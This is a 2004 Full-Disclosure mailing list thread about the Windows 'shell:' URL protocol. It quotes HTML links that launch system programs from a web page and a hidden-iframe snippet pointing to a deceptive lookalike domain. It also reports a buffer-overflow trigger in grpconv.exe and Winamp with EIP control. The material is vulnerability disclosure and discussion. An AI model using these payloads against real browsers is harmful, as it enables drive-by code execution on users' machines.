This is dangerous. Based on the file extension of the shell protocol different applications may be launched. For example: shell:.its will launch Internet Explorer and shell:.mp3 will launch Winamp.
The trick is to find an application that will overflow when given a very long parameter. A quick check showed that a buffer overflow occured within MSProgramGroup (WINDOWS\System32\grpconv.exe) after around 230 bytes with the following URL: shell:[x*221].grp EIP can be controled, but exploitation is a bit tricky since parameter is stored as unicode. Also Winamp contains an BO (no unicode here). Tested environment: Windows XP pro + FireFox 0.9.1 /Andreas Sandblad On Wed, 7 Jul 2004, Perrymon, Josh L. wrote: > -----snip------ > center><br><br><img src="nocigar.gif"></center> > <center> > <a href="shell:windows\snakeoil.txt">who goes there</a></center> <iframe > src="http://windowsupdate.microsoft.com%2F.http- > equiv.dyndns.org/~http-equiv/b*llsh*t.html" style="display:none"> > [customise as you see fit] > <http://www.malware.com/stockpump.html> > ------end---------- > The code above has interest to me. > Even in Mozilla the commands below will work. > <a href=shell:windows\\system32\\calc.exe>1</a> > <a href=shell:windows\system32\calc.exe>2</a> > <a href=shell:windows\system32\winver.exe>4</a> > Just save them to an .html file and run it. > The first one with the double quotes was from bugtraq: > Bugtraq: Internet Explorer Causing Explorer.exe - Null Pointer Crash > <http://seclists.org/lists/bugtraq/2004/Mar/0188.html> > The links below that will run calc as well as winver. > It seems it calls windows as a virtual dir because c:\winxp is what I have. > I have been playing around to see if cmd.exe will work with it but without > luck. > This is what is in the registry. > HKEY_CLASSES_ROOT\Shell > Look in the registry key above. You will find the shell object calls Windows > Explorer with a particular set of arguments. > %SystemRoot%\Explorer.exe /e,/idlist,%I,%L > So this is tied to explorer.exe. This is something involved with the > underlying functions of windows > and not IE so to speak because it works in Mozilla or from the run line. > I'm trying to find out more about the shell: command because I can put a > link on a site that seems to run anything > in system32 dir. I'd like to see if you can pass parameters to it. > > Anyone give me more info on the shell:windows command? > JP > > > Joshua Perrymon > Sr. Network Security Consultant > PGP Fingerprint > 51B8 01AC E58B 9BFE D57D 8EF6 C0B2 DECF EC20 6021 > > **********CONFIDENTIALITY NOTICE********** > The information contained in this e-mail may be proprietary and/or > privileged and is intended for the sole use of the individual or > organization named above. If you are not the intended recipient or an > authorized representative of the intended recipient, any review, copying > or distribution of this e-mail and its attachments, if any, is prohibited. > If you have received this e-mail in error, please notify the sender > immediately by return e-mail and delete this message from your system. > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > -- _ _ o' \,=./ `o (o o) ---ooO--(_)--Ooo--- Andreas Sandblad Sweden _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
